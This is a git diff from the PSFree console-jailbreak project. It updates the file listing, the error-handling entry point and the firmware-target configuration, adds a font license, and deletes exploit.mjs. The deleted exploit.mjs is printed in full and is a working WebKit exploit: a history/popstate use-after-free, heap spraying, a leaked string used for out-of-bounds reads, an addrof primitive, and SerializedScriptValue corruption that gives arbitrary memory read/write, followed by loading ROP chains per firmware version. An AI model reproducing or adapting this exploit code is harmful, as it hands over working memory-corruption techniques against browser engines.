-        <tr>
-            <td><a href="./rop/900.mjs">rop/900.mjs</a></td>
-            <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
-            <td><a href="./rop/900.mjs" download>download</a></td>
-        </tr>
         <tr>
             <td><a href="./module/chain.mjs">module/chain.mjs</a></td>
             <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
@@ -82,9 +72,9 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
             <td><a href="./module/int64.mjs" download>download</a></td>
         </tr>
         <tr>
-            <td><a href="./module/constants.mjs">module/constants.mjs</a></td>
+            <td><a href="./module/view.mjs">module/view.mjs</a></td>
             <td><a href="https://www.gnu.org/licenses/agpl-3.0.html">GNU-AGPL-3.0-or-later</a></td>
-            <td><a href="./module/constants.mjs" download>download</a></td>
+            <td><a href="./module/view.mjs" download>download</a></td>
         </tr>
         <tr>
             <td><a href="./module/memtools.mjs">module/memtools.mjs</a></td>
@@ -118,5 +108,9 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.
     <a href="./kpatch/Makefile">kpatch/Makefile</a><br>
     <a href="./kpatch/80x.c">kpatch/80x.c</a><br>
     <a href="./kpatch/types.h">kpatch/types.h</a><br>
+    fonts/ files:<br>
+    <a href="./fonts/README.txt">fonts/README.txt</a><br>
+    <a href="./fonts/FONTS.LICENSE">fonts/FONTS.LICENSE</a><br>
+    <a href="./fonts/LiberationMono-Regular.ttf">fonts/LiberationMono-Regular.ttf</a><br>
     </body>
 </html>
diff --git a/alert.mjs b/alert.mjs
index 7b65567..b5a7371 100644
--- a/alert.mjs
+++ b/alert.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023-2024 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -16,23 +16,37 @@ You should have received a copy of the GNU Affero General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 
 // We can't just open a console on the ps4 browser, make sure the errors thrown
-// by our modules are alerted. We use alert() instead of debug_log() because
-// while we are developing, we may modify the utils.mjs module and introduce
-// bugs. We can not use debug_log() if it throws an error.
-//
-// We added this new file instead of putting this on run.mjs, so we can ensure
-// we can attach this listener first before running anything.
-addEventListener('unhandledrejection', (event) => {
+// by our program are alerted.
+
+// We don't use a custom logging function to avoid a dependency on a logging
+// module since we want this file to stand alone. We don't want to copy the
+// log function here either for the sake avoiding dependencies since using
+// alert() is good enough.
+
+// We log the line and column numbers as well since some exceptions (like
+// SyntaxError) do not show it in the stack trace.
+
+addEventListener('unhandledrejection', event => {
     const reason = event.reason;
-    // We log the line and column numbers as well since some exceptions (like
-    // SyntaxError) do not show it in the stack trace.
     alert(
-        `${reason}\n`
+        'Unhandled rejection\n'
+        + `${reason}\n`
         + `${reason.sourceURL}:${reason.line}:${reason.column}\n`
         + `${reason.stack}`
     );
-    throw reason;
-})
+});
 
-// important that we dynamically import the exploit script after we attach
-import('./exploit.mjs');
+addEventListener('error', event => {
+    const reason = event.error;
+    alert(
+        'Unhandled error\n'
+        + `${reason}\n`
+        + `${reason.sourceURL}:${reason.line}:${reason.column}\n`
+        + `${reason.stack}`
+    );
+    return true;
+});
+
+// we have to dynamically import the program if we want to catch its syntax
+// errors
+import('./psfree.mjs');
diff --git a/config.mjs b/config.mjs
index 68431a5..60325c8 100644
--- a/config.mjs
+++ b/config.mjs
@@ -1,4 +1,4 @@
-/* Copyright (C) 2023-2024 anonymous
+/* Copyright (C) 2023-2025 anonymous
 
 This file is part of PSFree.
 
@@ -22,82 +22,49 @@ along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
 // can affect the size of SerializedScriptValue
 //
 // this target is no longer supported
+
+// target firmware format used by PSFree
 //
-//export const gtk_2_34_4 = 0;
+// 0xC_MM_mm
+//
+// * C console - PS4 (0) or PS5 (1) (1 bit)
+// * MM major version - integer part of the firmware version (8 bits)
+// * mm minor version - fractional part of the firmware version (8 bits)
+//
+// examples:
+// * PS4 10.00 -> C = 0 MM = 10 mm = 0 -> 0x0_10_00
+// * PS5 4.51 -> C = 1 MM = 4 mm = 51 -> 0x1_04_51
 
-// the original target platform was 8.03, this version confirmed works on ps4
-// 7.xx-8.xx
-export const ps4_8_03 = 1;
+// check if value is in Binary Coded Decimal format
+// assumes integer and is in the range [0, 0xffff]
+function check_bcd(value) {
+    for (let i = 0; i <= 12; i += 4) {
+        const nibble = (value >>> i) & 0xf;
 
-// this version for 9.xx
-export const ps4_9_00 = 2;
+        if (nibble > 9) {
+            return false;
+        }
+    }
 
-// version 9.xx is for ps5 1.xx-5.xx as well
-export const ps5_5_00 = ps4_9_00;
-
-// this version for 6.50-6.72
-export const ps4_6_50 = 3;
-
-// this version for 6.00-6.20
-export const ps4_6_00 = 4;
+    return true;
+}
 
 export function set_target(value) {
-    switch (value) {
-        case ps4_8_03:
-        case ps4_9_00:
-        case ps4_6_00:
-        case ps4_6_50: {
-            break;
-        }
-        default: {
-            throw RangeError('invalid target: ' + target);
-        }
+    if (!Number.isInteger(value)) {
+        throw TypeError(`value not an integer: ${value}`);
+    }
+
+    if (value >= 0x20000 || value < 0) {
+        throw RangeError(`value >= 0x20000 or value < 0: ${value}`);
+    }
+
+    const version = value & 0xffff;
+    if (!check_bcd(version)) {
+        throw RangeError(`value & 0xffff not in BCD format ${version}`);
     }
 
     target = value;
 }
 
-function DetectFirmwareVersion() //function by kameleon :)
-{
-    var UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("PlayStation 4/","");
-    
-    if (UA == "6.00" || UA == "6.02" || UA == "6.10" || UA == "6.20")
-    {
-        return ps4_6_00;
-    }
-
-    if (UA == "6.50" || UA == "6.70" || UA == "6.71" || UA == "6.72")
-    {
-        return ps4_6_50;
-    }
-
-    if (UA == "7.01" || UA == "7.02" || UA == "7.50" || UA == "7.51" || UA == "7.55" || UA == "8.00" || UA == "8.01" || UA == "8.03")
-    {
-        return ps4_8_03;
-    }
-    
-    //on 9.00 Fw detection changed to laystation instead of regular Playstation
-    UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("layStation 4/","");
-
-    if (UA == "8.50" || UA == "8.51")
-    {
-        return ps4_8_03;
-    }
-    if (UA == "9.00" || UA == "9.03" || UA == "9.04" || UA == "9.50" ||  UA == "9.51" || UA == "9.60")
-    {
-        return ps4_9_00;
-    }
-
-    //get user agent for PS5 (taken from PS5 Specter Exploit Host)
-    const supportedFirmwares = ["1.00","1.01","1.02","1.05","1.12","1.14","2.00","2.10","2.20","2.25","2.26","2.30","2.50","2.70","3.00","3.10","3.20","3.21","4.00", "4.02", "4.03", "4.50", "4.51","5.00","5.02","5.10","5.50"];
-    const fw_idx = navigator.userAgent.indexOf('PlayStation; PlayStation 5/') + 27;
-    const fw_str = navigator.userAgent.substring(fw_idx, fw_idx + 4);
-
-    if (supportedFirmwares.includes(fw_str)) 
-    {
-        return ps5_5_00;
-    }
-
-}
-
-export let target = DetectFirmwareVersion();
+export let target = null;
+set_target(0x900);
diff --git a/exploit.mjs b/exploit.mjs
deleted file mode 100644
index aec7771..0000000
--- a/exploit.mjs
+++ /dev/null
@@ -1,757 +0,0 @@
-/* Copyright (C) 2023-2024 anonymous
-
-This file is part of PSFree.
-
-PSFree is free software: you can redistribute it and/or modify
-it under the terms of the GNU Affero General Public License as
-published by the Free Software Foundation, either version 3 of the
-License, or (at your option) any later version.
-
-PSFree is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-GNU Affero General Public License for more details.
-
-You should have received a copy of the GNU Affero General Public License
-along with this program.  If not, see <https://www.gnu.org/licenses/>.  */
-
-import * as config from './config.mjs';
-
-import {
-    read32,
-    read64,
-    write16,
-    write32,
-    write64,
-    sread64,
-} from './module/rw.mjs';
-
-import * as o from './module/offset.mjs';
-
-import { Int } from './module/int64.mjs';
-import { Memory } from './module/mem.mjs';
-
-import {
-    die,
-    debug_log,
-    clear_log,
-    str2array,
-} from './module/utils.mjs';
-
-const ssv_len = (() => {
-    switch (config.target) {
-        case config.ps4_6_00: {
-            return 0x58;
-        }
-        case config.ps4_9_00: {
-            return 0x50;
-        }
-        case config.ps4_6_50:
-        case config.ps4_8_03: {
-            return 0x48;
-        }
-        default: {
-            throw RangeError('invalid config.target: ' + config.target);
-        }
-    }
-})();
-
-const num_reuse = 0x400;
-
-// size of JSArrayBufferView
-const original_strlen = ssv_len - o.size_strimpl;
-const buffer_len = 0x20;
-// make sure this is large enough to ensure that enough strings will
-// occupy any gaps in in the relative read area so when are trying to leak the
-// JSArrayBufferView we won't hit any unmapped areas
-const num_str = 0x400;
-const num_gc = 30;
-const num_space = 19;
-const original_loc = window.location.pathname;
-const loc = original_loc + '#foo';
-
-// this variable has to be global for the leak to work
-let rstr = null;
-// this variable has to be global so that the exploit is more likely to succeed
-let view_leak_arr = [];
-// These variables need to be global because we theorize there are
-// optimizations between local and global variables.
-// We don't know what optimizations these are but it is messing with us.
-
-// contents of the JSArrayBufferView
-// 3rd element is the address of the buffer of the JSArrayBufferView
-let jsview = [];
-
-// object for saving values
-let s1 = {views : []};
-let view_leak = null;
-
-let input = document.body.appendChild(document.createElement("input"));
-let foo = document.body.appendChild(document.createElement("a"));
-foo.id = "foo";
-
-// The theory is that the allocator and garbage collector (GC) cooperate in
-// serving allocation requests. The GC knows if there are any garbage that can
-// be collected, to free up memory for requests. If the allocator can't serve a
-// request, it will ask the GC to perform a garbage collection.
-//
-// If even after a garbage colllection, there is still no memory left for
-// allocation, then the process will request the operating system to increase
-// its heap size.
-//
-// We loop a couple of times by num_loop in allocating memory and dropping
-// references to it. Even though we dropped the references immediately, memory
-// consumption will still grow, since garbage is not immediately collected.
-// Hopefully one of the requests will force the allocator to yield to the GC.
-let pressure = null;
-function gc(num_loop) {
-   pressure = Array(100);
-   for (let i = 0; i < num_loop; i++) {
-       for (let i = 0; i < pressure.length; i++) {
-           pressure[i] = new Uint32Array(0x40000);
-       }
-       pressure = Array(100);
-   }
-   pressure = null;
-}
-
-function sleep(ms) {
-    return new Promise(resolve => setTimeout(resolve, ms));
-}
-
-function prepare_uaf() {
-    // don't want any state0 near state1
-    history.pushState('state0', '');
-    for (let i = 0; i < num_space; i++) {
-        history.replaceState('state0', '');
-    }
-
-    history.replaceState("state1", "", loc);
-
-    // don't want any state2 near state1
-    history.pushState("state2", "");
-    for (let i = 0; i < num_space; i++) {
-        history.replaceState("state2", "");
-    }
-}
-
-function free(save) {
-    // We replace the URL with the original so the user can rerun the exploit
-    // via a reload. If we don't then the exploit will append another "#foo" to
-    // the URL and the input element will not be blurred because the foo
-    // element won't be scrolled to during history.back().
-    history.replaceState('state3', '', original_loc);
-
-    for (let i = 0; i < num_reuse; i++) {
-        let view = new Uint8Array(new ArrayBuffer(ssv_len));
-        for (let i = 0; i < view.length; i++) {
-            view[i] = 0x41;
-        }
-        save.views.push(view);
-    }
-}
-
-function check_spray(views) {
-    if (views.length !== num_reuse) {
-        debug_log(`views.length: ${views.length}`);
-        die('views.length !== num_reuse, restart the entire exploit');
-    }
-
-    for (let i = 0; i < num_reuse; i++) {
-        if (views[i][0] !== 0x41) {
-            return i;
-        }
-    }
-    return null;
-}
-
-async function use_after_free(pop_func, save) {
-    const pop_promise = new Promise((resolve, reject) => {
-        function pop_wrapper(event) {
-            try {
-                pop_func(event, save);
-            } catch (e) {
-                reject(e);
-            }
-            resolve();
-        }
-        addEventListener("popstate", pop_wrapper, {once:true});
-    });
-
-    prepare_uaf();
-
-    let num_free = 0;
-    function onblur() {
-        if (num_free > 0)  {
-            die('multiple free()s, restart the entire exploit');
-        }
-        free(save);
-        num_free++;
-    }
-
-    input.onblur = onblur;
-    await new Promise((resolve) => {
-        input.addEventListener('focus', resolve, {once:true});
-        input.focus();
-    });
-    history.back();
-
-    await pop_promise;
-}
-
-// get arbitrary read
-async function setup_ar(save) {
-    const view = save.ab;
-
-    // set refcount to 1, all other fields to 0/NULL
-    view[0] = 1;
-    for (let i = 1; i < view.length; i++) {
-        view[i] = 0;
-    }
-
-    delete save.views;
-    delete save.pop;
-    gc(num_gc);
-    debug_log('setup_ar() gc done');
-
-    // Extra sleep if the object hasn't been collected yet, this is to allow
-    // the garbage collector to preempt us. Keeping the call to gc() lowers the
-    // average total sleep time.
-    let total_sleep = 0;
-    const num_sleep = 8;
-    // Don't sleep for 9.xx. Tests show it is slower. This check and the sleep
-    // before double_free() make setup_ar() fast for 9.xx.
-    while (true && config.target !== config.ps4_9_00) {
-        await sleep(num_sleep);
-        total_sleep += num_sleep;
-
-        if (view[0] !== 1) {
-            break;
-        }
-    }
-    debug_log(`total_sleep: ${total_sleep}`);
-    // log to check if the garbage collector did collect PopStateEvent
-    // must not log "1, 0, 0, 0, ..."
-    debug_log(view);
-
-    let num_spray = 0;
-    while (true) {
-        const obj = {};
-        num_spray++;
-
-        for (let i = 0; i < num_str; i++) {
-            let str = new String(
-                'B'.repeat(original_strlen - 5)
-                + i.toString().padStart(5, '0')
-            );
-            obj[str] = 0x1337;
-        }
-
-        if (view[o.strimpl_inline_str] === 0x42) {
-            write32(view, o.strimpl_strlen, 0xffffffff);
-        } else {
-            continue;
-        }
-
-        let found = false;
-        const str_arr = Object.getOwnPropertyNames(obj);
-        for (let i = 0; i < str_arr.length; i++) {
-            if (str_arr[i].length > 0xff) {
-                rstr = str_arr[i];
-                found = true;
-                debug_log('confirmed correct leaked');
-                debug_log(`str len: ${rstr.length}`);
-                debug_log(view);
-                debug_log(`read address: ${read64(view, o.strimpl_m_data)}`);
-                break;
-            }
-        }
-        if (!found) {
-            continue;
-        }
-
-        debug_log(`num_spray: ${num_spray}`);
-        return;
-    }
-}
-
-async function double_free(save) {
-    const view = save.ab;
-
-    await setup_ar(save);
-
-    // Spraying JSArrayBufferViews
-    debug_log('spraying views');
-    let buffer = new ArrayBuffer(buffer_len);
-    let tmp = [];
-    const num_alloc = 0x10000;
-    const num_threshold = 0xfc00;
-    const num_diff = num_alloc - num_threshold;
-    for (let i = 0; i < num_alloc; i++) {
-        // The last allocated are more likely to be allocated after our relative read
-        if (i >= num_threshold) {
-            view_leak_arr.push(new Uint8Array(buffer));
-        } else {
-            tmp.push(new Uint8Array(buffer));
-        }
-    }
-    tmp = null;
-    debug_log('done spray views');
-
-    // Force JSC ref on FastMalloc Heap
-    // https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
-    let props = [];
-    for (let i = 0; i < num_diff; i++) {
-        props.push({ value: 0x43434343 });
-        props.push({ value: view_leak_arr[i] });
-    }
-
-    debug_log('start find leak');
-    //
-    // /!\
-    // This part must avoid as much as possible fastMalloc allocation
-    // to avoid re-using the targeted object
-    // /!\
-    //
-    // Use relative read to find our JSC obj
-    // We want a JSArrayBufferView that is allocated after our relative read
-    search: while (true) {
-        Object.defineProperties({}, props);
-        for (let i = 0; i < 0x800000; i++) {
-            let v = null;
-            if (rstr.charCodeAt(i) === 0x43 &&
-                rstr.charCodeAt(i + 1) === 0x43 &&
-                rstr.charCodeAt(i + 2) === 0x43 &&
-                rstr.charCodeAt(i + 3) === 0x43
-            ) {
-                // check if PropertyDescriptor
-                if (rstr.charCodeAt(i + 0x08) === 0x00 &&
-                    rstr.charCodeAt(i + 0x0f) === 0x00 &&
-                    rstr.charCodeAt(i + 0x10) === 0x00 &&
-                    rstr.charCodeAt(i + 0x17) === 0x00 &&
-                    rstr.charCodeAt(i + 0x18) === 0x0e &&
-                    rstr.charCodeAt(i + 0x1f) === 0x00 &&
-                    rstr.charCodeAt(i + 0x28) === 0x00 &&
-                    rstr.charCodeAt(i + 0x2f) === 0x00 &&
-                    rstr.charCodeAt(i + 0x30) === 0x00 &&
-                    rstr.charCodeAt(i + 0x37) === 0x00 &&
-                    rstr.charCodeAt(i + 0x38) === 0x0e &&
-                    rstr.charCodeAt(i + 0x3f) === 0x00
-                ) {
-                    v = str2array(rstr, 8, i + 0x20);
-                // check if array of JSValues pointed by m_buffer
-                } else if (rstr.charCodeAt(i + 0x10) === 0x43 &&
-                    rstr.charCodeAt(i + 0x11) === 0x43 &&
-                    rstr.charCodeAt(i + 0x12) === 0x43 &&
-                    rstr.charCodeAt(i + 0x13) === 0x43) {
-                    v = str2array(rstr, 8, i + 8);
-                }
-            }
-            if (v !== null) {
-                view_leak = new Int(v);
-                break search;
-            }
-        }
-    }
-    //
-    // /!\
-    // Critical part ended-up here
-    // /!\
-    //
-    debug_log('end find leak');
-    debug_log('view addr ' + view_leak);
-
-    let rstr_addr = read64(view, o.strimpl_m_data);
-    write64(view, o.strimpl_m_data, view_leak);
-    for (let i = 0; i < 4; i++) {
-        jsview.push(sread64(rstr, i*8));
-    }
-    write64(view, o.strimpl_m_data, rstr_addr);
-    write32(view, o.strimpl_strlen, original_strlen);
-    debug_log('contents of JSArrayBufferView');
-    debug_log(jsview);
-}
-
-function find_leaked_view(rstr, view_rstr, view_m_vector, view_arr) {
-    const old_m_data = read64(view_rstr, o.strimpl_m_data);
-
-    let res = null;
-    write64(view_rstr, o.strimpl_m_data, view_m_vector);
-    for (const view of view_arr) {
-        const magic = 0x41424344;
-        write32(view, 0, magic);
-
-        if (sread64(rstr, 0).low() === magic) {
-            res = view;
-            break;
-        }
-    }
-    write64(view_rstr, o.strimpl_m_data, old_m_data);
-
-    if (res === null) {
-        die('not found');
-    }
-    return res;
-}
-
-
-class Reader {
-    // leaker will be the view whose address we leaked
-    constructor(rstr, view_rstr, leaker, leaker_addr) {
-        this.rstr = rstr;
-        this.view_rstr = view_rstr;
-        this.leaker = leaker;
-        this.leaker_addr = leaker_addr;
-        this.old_m_data = read64(view_rstr, o.strimpl_m_data);
-
-        // Create a butterfy with the "a" property as the first. leaker is a
-        // JSArrayBufferView. Instances of that class don't have inlined
-        // properties and the butterfly is immediately created.
-        leaker.a = 0; // dummy value, we just want to create the "a" property
-    }
-
-    addrof(obj) {
-        if (typeof obj !== 'object'
-            && typeof obj !== 'function'
-        ) {
-            throw TypeError('addrof argument not a JS object');
-        }
-
-        this.leaker.a = obj;
-
-        // no need to modify the length, original_strlen is large enough
-        write64(this.view_rstr, o.strimpl_m_data, this.leaker_addr);
-
-        const butterfly = sread64(this.rstr, o.js_butterfly);
-        write64(this.view_rstr, o.strimpl_m_data, butterfly.sub(0x10));
-
-        const res = sread64(this.rstr, 0);
-
-        write64(this.view_rstr, o.strimpl_m_data, this.old_m_data);
-        return res;
-    }
-
-    get_view_vector(view) {
-        if (!ArrayBuffer.isView(view)) {
-            throw TypeError(`object not a JSC::JSArrayBufferView: ${view}`);
-        }
-
-        write64(this.view_rstr, o.strimpl_m_data, this.addrof(view));
-        const res = sread64(this.rstr, o.view_m_vector);
-
-        write64(this.view_rstr, o.strimpl_m_data, this.old_m_data);
-        return res;
-    }
-}
-
-// data to write to the SerializedScriptValue
-//
-// Setup to make deserialization create an ArrayBuffer with its buffer address
-// pointing to a JSArrayBufferView (worker).
-//
-// TypedArrays (JSArrayBufferView) created via "new TypedArray(x)" where x <=
-// 1000 (fastSizeLimit) have ther buffers allocated on the JavaScript heap
-// (m_mode = FastTypedArray). Requesting the buffer property ("view.buffer")
-// (calls possiblySharedBuffer()) of such a view will allocate a new buffer on
-// the fastMalloc heap, the contents of the old one will be copied. This will
-// change the m_vector field, so care must be taken if you cache the result of
-// get_view_vector(), you must call it again to get the updated field.
-//
-// See enum TypedArrayMode from
-// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferView.h and
-// possiblySharedBuffer() from
-// WebKit/Source/JavaScriptCore/runtime/JSArrayBufferViewInlines.h at PS4 8.03.
-function setup_ssv_data(reader) {
-    const r = reader;
-    // sizeof WTF::Vector<T>
-    const size_vector = 0x10;
-    // sizeof JSC::ArrayBufferContents
-    const size_abc = config.target === config.ps4_9_00 ? 0x18 : 0x20;
-
-    // WTF::Vector<unsigned char>
-    const m_data = new Uint8Array(size_vector);
-    const data = new Uint8Array(9);
-
-    // m_buffer
-    write64(m_data, 0, r.get_view_vector(data));
-    // m_capacity
-    write32(m_data, 8, data.length);
-    // m_size
-    write32(m_data, 0xc, data.length);
-
-    // 6 is the serialization format version number for ps4 6.00. The format
-    // is backwards compatible and using a value less than the current version
-    // number used by a specific WebKit version is considered valid.
-    //
-    // See CloneDeserializer::isValid() from
-    // WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.03.
-    const CurrentVersion = 6;
-    const ArrayBufferTransferTag = 23;
-    write32(data, 0, CurrentVersion);
-    data[4] = ArrayBufferTransferTag;
-    write32(data, 5, 0);
-
-    // WTF::Vector<JSC::ArrayBufferContents>
-    const abc_vector = new Uint8Array(size_vector);
-    // JSC::ArrayBufferContents
-    const abc = new Uint8Array(size_abc);
-
-    write64(abc_vector, 0, r.get_view_vector(abc));
-    write32(abc_vector, 8, 1);
-    write32(abc_vector, 0xc, 1);
-
-    // m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
-    // unlike FastTypedArray, where the buffer is managed by the GC. This
-    // prevents random crashes.
-    //
-    // See JSGenericTypedArrayView<Adaptor>::visitChildren() from
-    // WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
-    // PS4 8.03.
-    const worker = new Uint8Array(new ArrayBuffer(1));
-
-    if (config.target !== config.ps4_9_00) {
-        // m_destructor
-        write64(abc, 0, Int.Zero);
-        // m_shared
-        write64(abc, 8, Int.Zero);
-        // m_data
-        write64(abc, 0x10, r.addrof(worker));
-        // m_sizeInBytes
-        write32(abc, 0x18, o.size_view);
-    } else {
-        // m_data
-        write64(abc, 0, r.addrof(worker));
-        // m_destructor (48 bits)
-        write32(abc, 8, 0);
-        write16(abc, 0xc, 0);
-        // m_shared (48 bits)
-        write32(abc, 0xe, 0);
-        write16(abc, 0x12, 0);
-        // m_sizeInBytes
-        write32(abc, 0x14, o.size_view);
-    }
-
-    return {
-        m_data,
-        m_arrayBufferContentsArray : r.get_view_vector(abc_vector),
-        worker,
-        // keep a reference to prevent garbage collection
-        nogc : [
-            data,
-            abc_vector,
-            abc,
-        ],
-    };
-}
-
-// get arbitrary read/write
-async function setup_arw(save, ssv_data) {
-    const num_msg = 1000;
-    const view = save.ab;
-    let msgs = [];
-
-    function onmessage(event) {
-        msgs.push(event);
-    }
-    addEventListener('message', onmessage);
-
-    // Free the StringImpl so we can spray SerializedScriptValues over the
-    // buffer of the view. The StringImpl is safe to free since we fixed it up
-    // earlier.
-    rstr = null;
-    while (true) {
-        for (let i = 0; i < num_msg; i++) {
-            postMessage('', origin);
-        }
-
-        while (msgs.length !== num_msg) {
-            await sleep(100);
-        }
-
-        if (view[o.strimpl_inline_str] !== 0x42) {
-            break;
-        }
-
-        msgs = [];
-    }
-    removeEventListener('message', onmessage);
-
-    debug_log('view contents:');
-    for (let i = 0; i < ssv_len; i += 8) {
-        debug_log(read64(view, i));
-    }
-
-    // save SerializedScriptValue
-    const copy = [];
-    for (let i = 0; i < view.length; i++) {
-        copy.push(view[i]);
-    }
-
-    const {m_data, m_arrayBufferContentsArray, worker, nogc} = ssv_data;
-    write64(view, 8, read64(m_data, 0));
-    write64(view, 0x10, read64(m_data, 8));
-    write64(view, 0x18, m_arrayBufferContentsArray);
-
-    for (const msg of msgs) {
-        if (msg.data !== '') {
-            debug_log('achieved arbitrary r/w');
-
-            const u = new Uint8Array(msg.data);
-            debug_log('deserialized ArrayBuffer:');
-            for (let i = 0; i < o.size_view; i += 8) {
-                debug_log(read64(u, i));
-            }
-
-            const mem = new Memory(u, worker);
-
-            // restore SerializedScriptValue
-            view.set(copy);
-
-            // cleanup
-            view_leak_arr = null;
-            view_leak = null;
-            jsview = null;
-            input = null;
-            foo = null;
-
-            // Before s1.ab gets garbage collected and its underlying buffer
-            // on the fastMalloc heap is freed, another object could be
-            // allocated in the meantime. That object could be freed
-            // prematurely once the GC occurs. This could corrupt the object
-            // if another object is allocated in the same memory area.
-            //
-            // So we will keep s1 alive.
-
-            return;
-        }
-    }
-    die('no arbitrary r/w');
-}
-
-// Don't create additional references to rstr, use the global variable. This
-// is to make dropping all its references easy (change the value of the global
-// variable).
-async function triple_free(
-    save,
-    // contents of the leaked JSArrayBufferView
-    jsview,
-    view_leak_arr,
-    leaked_view_addr,
-) {
-    const leaker = find_leaked_view(rstr, save.ab, jsview[2], view_leak_arr);
-    let r = new Reader(rstr, save.ab, leaker, leaked_view_addr);
-    const ssv_data = setup_ssv_data(r);
-
-    // r contains a reference to rstr, drop it for setup_arw()
-    r = null;
-    await setup_arw(save, ssv_data);
-}
-
-function pop(event, save) {
-    let spray_res = check_spray(save.views);
-    if (spray_res === null) {
-        die('failed spray');
-    } else {
-        save.pop = event;
-        save.ab = save.views[spray_res];
-        debug_log('ssv len: ' + ssv_len);
-        debug_log('view index: ' + spray_res);
-        debug_log(save.ab);
-    }
-}
-
-// For some reason the input element is being blurred by something else (we
-// don't know what) if we execute use_after_free() before the DOMContentLoaded
-// event fires. The input must only be blurred by history.back(), which will
-// change the focus from the input to the foo element.
-async function get_ready() {
-    debug_log('readyState: ' + document.readyState);
-    await new Promise((resolve, reject) => {
-        if (document.readyState === 'interactive' || document.readyState === 'complete') {
-            resolve();
-        }
-        document.addEventListener('DOMContentLoaded', resolve, { once: true });
-    });
-}
-
-//load per firmware Rop Test function by kameleon..
-function ExecRopByFw()
-{
-    var UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("PlayStation 4/","");
-    
-    if (UA == "6.00" || UA == "6.02" || UA == "6.10" || UA == "6.20")
-    {
-        alert("No ROP implemented");
-    }
-
-    if (UA == "6.50" || UA == "6.70" || UA == "6.71" || UA == "6.72")
-    {
-        alert("No ROP implemented");
-    }
-
-    if (UA == "7.01" || UA == "7.02" || UA == "7.50" || UA == "7.51" || UA == "7.55")
-    {
-        import('./send.mjs');
-    }
-
-     //8.00 and 8.01 need to be tested.. this is mostly for 8.03
-    if (UA == "8.00" || UA == "8.01" || UA == "8.03")
-    {
-        import('./rop/800.mjs');
-    }
-
-    //on 8.5x to 9.60 Fw detection changed to laystation instead of regular Playstation
-    UA = navigator.userAgent.substring(navigator.userAgent.indexOf('5.0 (') + 19, navigator.userAgent.indexOf(') Apple')).replace("layStation 4/","");
-
-    if (UA == "8.50" ||  UA == "8.51")
-    {
-        import('./rop/850.mjs');
-    }
-    
-    if (UA == "9.00" || UA == "9.03" || UA == "9.04")
-    {
-        import('./rop/900.mjs');
-    }
-
-    if (UA == "9.50" || UA == "9.51" || UA == "9.60")
-    {
-        import('./rop/950.mjs');
-    }
-
-    //get user agent for PS5 (taken from PS5 Specter Exploit Host)
-    const supportedFirmwares = ["1.00","1.01","1.02","1.05","1.12","1.14","2.00","2.10","2.20","2.25","2.26","2.30","2.50","2.70","3.00","3.10","3.20","3.21","4.00", "4.02", "4.03", "4.50", "4.51","5.00","5.02","5.10","5.50"];
-    const fw_idx = navigator.userAgent.indexOf('PlayStation; PlayStation 5/') + 27;
-    const fw_str = navigator.userAgent.substring(fw_idx, fw_idx + 4);
-
-    if (supportedFirmwares.includes(fw_str)) 
-    {
-        alert("No ROP implemented");
-    }
-
-}
-
-async function run() {
-    debug_log('stage: readying');
-    await get_ready();
-
-    debug_log('stage: UaF 1');
-    await use_after_free(pop, s1);
-
-    // we trigger the leak first because it is more likely to work
-    // than if it were to happen during the second ssv smashing
-    // on the ps4
-    debug_log('stage: double free');
-    // * keeps setup_ar()'s total sleep even lower
-    // * also helps the garbage collector scheduling for 9.xx
-    await sleep(0);
-    await double_free(s1);
-
-    debug_log('stage: triple free');
-    await triple_free(s1, jsview, view_leak_arr, view_leak);
-
-    clear_log();
-    // path to your script that will use the exploit
-    ExecRopByFw();
-}
-
-run();
diff --git a/fonts/FONTS.LICENSE b/fonts/FONTS.LICENSE
new file mode 100644
index 0000000..94475dd
--- /dev/null
+++ b/fonts/FONTS.LICENSE
@@ -0,0 +1,101 @@
+Digitized data copyright (c) 2010 Google Corporation
+    with Reserved Font Arimo, Tinos and Cousine.
+Copyright (c) 2012 Red Hat, Inc.
+    with Reserved Font Name Liberation.
+
+This Font Software is licensed under the SIL Open Font License,
+Version 1.1.
+
+This license is copied below, and is also available with a FAQ at:
+http://scripts.sil.org/OFL
+
+SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
+
+PREAMBLE The goals of the Open Font License (OFL) are to stimulate
+worldwide development of collaborative font projects, to support the font
+creation efforts of academic and linguistic communities, and to provide
+a free and open framework in which fonts may be shared and improved in
+partnership with others.
+
+The OFL allows the licensed fonts to be used, studied, modified and
+redistributed freely as long as they are not sold by themselves.
+The fonts, including any derivative works, can be bundled, embedded,
+redistributed and/or sold with any software provided that any reserved
+names are not used by derivative works.  The fonts and derivatives,
+however, cannot be released under any other type of license.  The
+requirement for fonts to remain under this license does not apply to
+any document created using the fonts or their derivatives.
+
+
+
+DEFINITIONS
+"Font Software" refers to the set of files released by the Copyright
+Holder(s) under this license and clearly marked as such.
+This may include source files, build scripts and documentation.
+
+"Reserved Font Name" refers to any names specified as such after the
+copyright statement(s).
+
+"Original Version" refers to the collection of Font Software components
+as distributed by the Copyright Holder(s).
+
+"Modified Version" refers to any derivative made by adding to, deleting,
+or substituting ? in part or in whole ?
+any of the components of the Original Version, by changing formats or
+by porting the Font Software to a new environment.
+
+"Author" refers to any designer, engineer, programmer, technical writer
+or other person who contributed to the Font Software.
+
+
+PERMISSION & CONDITIONS
+
